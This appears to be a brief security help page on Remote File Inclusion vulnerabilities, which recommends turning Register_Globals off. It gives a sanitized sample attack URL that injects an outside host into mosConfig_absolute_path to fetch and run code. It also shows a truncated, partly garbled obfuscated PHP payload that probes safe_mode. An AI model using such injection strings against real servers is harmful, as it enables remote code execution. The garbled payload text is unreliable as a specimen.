Remote File Includes
An RFI vulnerability exists when an attacker can insert a script or code into a URL and command your server to execute the evil code.
Note
It is important to note that File Inclusion attacks, such as these, can mostly be mitigated by turning Register_Globals off.
Turning this off ensures that the $page variable is not treated as a super-global variable, and thus does not allow an inclusion.
The following is a sanitized attempt to attack a server in just such a manner:
http://www.exampledomain.com/?mosConfig_absolute_path=http://www.forum.com/update/xxxxx/sys_yyyyy/i?
If the site in this example did not have appropriate safeguards in place, the following code would be executed:
$x0b="in\x72_\147\x65\x74"; $x0c="\184r\x74o\154\x6fwe\x72";
RFIcode, executingecho "c\162\141\156k\x5fr\157c\x6bs"; if (@$x0b("\222\x61\x33e_\x6d\144e") or $x0c(@$x0b("\x73a\x66\x65_m\x6fde")) == "\x6f\x6e") { echo "\345a\146\x65\155od\145\x3ao\156"; } else { echo "\345a\146e\x6do\x64e:\x6ff\x66...
